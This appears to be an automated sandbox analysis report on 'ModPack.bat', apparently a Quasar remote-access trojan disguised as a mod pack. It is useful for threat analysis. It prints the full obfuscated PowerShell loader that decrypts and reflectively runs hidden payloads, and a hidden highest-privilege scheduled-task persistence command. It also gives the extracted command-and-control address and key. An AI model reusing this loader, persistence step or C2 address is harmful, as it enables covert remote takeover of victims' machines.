Analysis
-
max time kernel
34s -
max time network
51s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-04-2024 20:25
Static task
static1
Behavioral task
behavioral1
Sample
ModPack.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ModPack.bat
Resource
win10v2004-20240412-en
General
-
Target
ModPack.bat
-
Size
1.6MB
-
MD5
3ab2a7793b323765353fa8e597cec156
-
SHA1
c892cc5095ac6f37d0e94bbc09e11abe3d62027a
-
SHA256
a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
-
SHA512
90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
-
SSDEEP
24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea
Malware Config
Extracted
quasar
1.4.1
Office04
notes-creation.gl.at.ply.gg:27030
6735a92b-88d2-4fbe-8e59-605a85072109
-
encryption_key
8681483EF512C654BECF205A0D74FFCA4B129A98
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Trapix Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/2996-53-0x000002346F4F0000-0x000002346F814000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 2996 powershell.exe 4 2996 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2516240262-2296879883-3965305654-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4140 powershell.exe 4140 powershell.exe 2664 powershell.exe 2664 powershell.exe 2996 powershell.exe 2996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4140 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeIncreaseQuotaPrivilege 2664 powershell.exe Token: SeSecurityPrivilege 2664 powershell.exe Token: SeTakeOwnershipPrivilege 2664 powershell.exe Token: SeLoadDriverPrivilege 2664 powershell.exe Token: SeSystemProfilePrivilege 2664 powershell.exe Token: SeSystemtimePrivilege 2664 powershell.exe Token: SeProfSingleProcessPrivilege 2664 powershell.exe Token: SeIncBasePriorityPrivilege 2664 powershell.exe Token: SeCreatePagefilePrivilege 2664 powershell.exe Token: SeBackupPrivilege 2664 powershell.exe Token: SeRestorePrivilege 2664 powershell.exe Token: SeShutdownPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeSystemEnvironmentPrivilege 2664 powershell.exe Token: SeRemoteShutdownPrivilege 2664 powershell.exe Token: SeUndockPrivilege 2664 powershell.exe Token: SeManageVolumePrivilege 2664 powershell.exe Token: 33 2664 powershell.exe Token: 34 2664 powershell.exe Token: 35 2664 powershell.exe Token: 36 2664 powershell.exe Token: SeIncreaseQuotaPrivilege 2664 powershell.exe Token: SeSecurityPrivilege 2664 powershell.exe Token: SeTakeOwnershipPrivilege 2664 powershell.exe Token: SeLoadDriverPrivilege 2664 powershell.exe Token: SeSystemProfilePrivilege 2664 powershell.exe Token: SeSystemtimePrivilege 2664 powershell.exe Token: SeProfSingleProcessPrivilege 2664 powershell.exe Token: SeIncBasePriorityPrivilege 2664 powershell.exe Token: SeCreatePagefilePrivilege 2664 powershell.exe Token: SeBackupPrivilege 2664 powershell.exe Token: SeRestorePrivilege 2664 powershell.exe Token: SeShutdownPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeSystemEnvironmentPrivilege 2664 powershell.exe Token: SeRemoteShutdownPrivilege 2664 powershell.exe Token: SeUndockPrivilege 2664 powershell.exe Token: SeManageVolumePrivilege 2664 powershell.exe Token: 33 2664 powershell.exe Token: 34 2664 powershell.exe Token: 35 2664 powershell.exe Token: 36 2664 powershell.exe Token: SeIncreaseQuotaPrivilege 2664 powershell.exe Token: SeSecurityPrivilege 2664 powershell.exe Token: SeTakeOwnershipPrivilege 2664 powershell.exe Token: SeLoadDriverPrivilege 2664 powershell.exe Token: SeSystemProfilePrivilege 2664 powershell.exe Token: SeSystemtimePrivilege 2664 powershell.exe Token: SeProfSingleProcessPrivilege 2664 powershell.exe Token: SeIncBasePriorityPrivilege 2664 powershell.exe Token: SeCreatePagefilePrivilege 2664 powershell.exe Token: SeBackupPrivilege 2664 powershell.exe Token: SeRestorePrivilege 2664 powershell.exe Token: SeShutdownPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeSystemEnvironmentPrivilege 2664 powershell.exe Token: SeRemoteShutdownPrivilege 2664 powershell.exe Token: SeUndockPrivilege 2664 powershell.exe Token: SeManageVolumePrivilege 2664 powershell.exe Token: 33 2664 powershell.exe Token: 34 2664 powershell.exe Token: 35 2664 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exedescription pid process target process PID 1312 wrote to memory of 4140 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 4140 1312 cmd.exe powershell.exe PID 4140 wrote to memory of 2664 4140 powershell.exe powershell.exe PID 4140 wrote to memory of 2664 4140 powershell.exe powershell.exe PID 4140 wrote to memory of 4536 4140 powershell.exe WScript.exe PID 4140 wrote to memory of 4536 4140 powershell.exe WScript.exe PID 4536 wrote to memory of 3632 4536 WScript.exe cmd.exe PID 4536 wrote to memory of 3632 4536 WScript.exe cmd.exe PID 3632 wrote to memory of 2996 3632 cmd.exe powershell.exe PID 3632 wrote to memory of 2996 3632 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_130_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_130.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_130.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_130.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_130.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_130.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2996
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD53ab2a7793b323765353fa8e597cec156
SHA1c892cc5095ac6f37d0e94bbc09e11abe3d62027a
SHA256a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
SHA51290c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
-
Filesize
115B
MD5962ce75d684f70da0e30425299039aae
SHA16ee8d1ef71b54cbc4a81899e52450f50b4bec6f8
SHA256232cbfca13c926ce3b974c4d45a69387a3ccf0d9e49f8ef41bc9fd231c590119
SHA5125bb9d8d46c354d46f7b8f35efcd6eab499f299edc62ae836e45f06ec4ce2502cd551cc45aeb251bac4aaf0841fa257fe9f902dfa384f84518c877c86a6fd5c18